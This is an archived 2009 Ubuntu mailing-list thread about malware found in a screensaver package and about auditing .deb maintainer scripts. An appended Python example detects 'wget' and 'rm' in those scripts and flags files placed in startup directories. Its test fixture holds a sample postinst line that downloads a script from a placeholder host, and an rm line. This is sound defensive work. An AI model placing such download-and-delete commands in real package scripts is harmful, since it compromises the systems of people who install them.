Ubuntu-based malware

Morgan Storey me at morganstorey.com
Mon Dec 14 10:41:45 GMT 2009


To be honest, though, you can do the same with most Windows install
files; MSIs and .exes are usually just a zip of all the DLLs, CABs and
EXEs, even sometimes a few batch files and VBScripts. The average user
won't look inside their installers, and may not know what they are
looking at if they did. Even advanced users won't open them all the
time, and then will they scour through some obscure Perl/Python/Ruby
code? Adding it to a repository scanner could be useful for the admins
of repos to run as an extra layer, though. It really comes back to the same
issue: don't install software from somewhere you don't trust, which can
be very difficult for Windows users. But not so much for Linux users:
stick to pretty much the standard repos and most malicious software
will get caught by the many eyes alone.


On Mon, Dec 14, 2009 at 9:20 PM, Christopher Lees
<christopher_lees at iprimus.com.au> wrote:
> On Mon, 2009-12-14 at 02:59 +0000, Paul wrote:
>
>> Just a quick follow-up from our previous discussions about viruses on
>> Linux.  This is why we still need to be careful:
>>
>>     * http://digitizor.com/2009/12/10/ubuntu-malware-for-ddos-attack-found-in-screensaver/
>>     * http://www.omgubuntu.co.uk/2009/12/malware-found-in-screensaver-for-ubuntu.html
>>
>> Backups and common sense are your most valuable allies!
>>
>> Paul
>
> Actually, the openness of Linux is also useful in detecting threats from
> Debian packages. You can open Debian packages in File Roller / other
> archive manager. Then you can see the preinst, postinst and prerm
> scripts and you can have a look at where the package will put files.
>
> Then if it's all okay, you can install the package.
>
> I'm thinking of writing a program to help audit the control scripts and
> where files get placed; you know, raising a warning if anything gets put
> into your init scripts or Upstart and raising a warning if "wget" or
> "rm" gets used inside the control scripts.
>
> Anyone else interested in this?
>
> Chris
>
>
> --
> ubuntu-au mailing list
> ubuntu-au at lists.ubuntu.com
> https://lists.ubuntu.com/mailman/listinfo/ubuntu-au
>
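
Added example, not part of the original thread or any participant's code: one way to implement the audit Chris describes, reading a .deb (an ar archive holding control.tar.* and data.tar.*) and warning when a maintainer script calls wget or rm or when a file lands in an init or Upstart directory. The names audit_deb, STARTUP_DIRS and the sample package are assumptions made for illustration; gzip, bzip2 and xz members are handled, and other compressions (such as zstd) depend on the Python version's tarfile support.

```python
import io, re, tarfile
STARTUP_DIRS = ("etc/init.d/", "etc/init/", "etc/rc")  # SysV init scripts, Upstart jobs, rc links
RISKY = re.compile(r"(?<![\w.-])(wget|rm)(?![\w-])")   # the two commands named in the thread
SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

def ar_members(blob):
    """Yield (name, data) for each member of the ar archive that wraps a .deb."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        name = blob[pos:pos + 16].decode().strip().rstrip("/")
        size = int(blob[pos + 48:pos + 58].decode())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + size % 2  # members are padded to an even offset

def audit_deb(blob):
    """Return warnings for risky maintainer-script commands and startup-file installs."""
    warnings = []
    for name, data in ar_members(blob):
        if not name.startswith(("control.tar", "data.tar")):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for m in tar:
                path = m.name.lstrip("./")
                if name.startswith("data.tar") and path.startswith(STARTUP_DIRS):
                    warnings.append(f"startup file: /{path}")
                elif name.startswith("control.tar") and m.isfile() and path in SCRIPTS:
                    text = tar.extractfile(m).read().decode("utf-8", "replace")
                    for n, line in enumerate(text.splitlines(), 1):
                        if not line.lstrip().startswith("#"):  # skip whole-line comments
                            warnings += [f"{path}:{n}: {cmd}" for cmd in RISKY.findall(line)]
    return warnings

def _tar(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()

def sample_deb():  # constructed sample built in memory, not a real package
    post = b"#!/bin/sh\n# rm in a comment\nwget -q http://example.invalid/update.sh\nrm -f /tmp/x\n"
    parts = [("debian-binary", b"2.0\n"), ("control.tar.gz", _tar({"./postinst": post})),
             ("data.tar.gz", _tar({"./usr/bin/demo": b"x", "./etc/init.d/demo": b"x"}))]
    head = lambda n, d: f"{n:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(d):<10}`\n".encode()
    return b"!<arch>\n" + b"".join(head(n, d) + d + b"\n" * (len(d) % 2) for n, d in parts)
print("\n".join(audit_deb(sample_deb())))
```

To check a real package, pass the file's bytes: audit_deb(open(path, "rb").read()). A hit is a prompt to read the script, not a verdict, since legitimate packages also use rm and ship init scripts.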


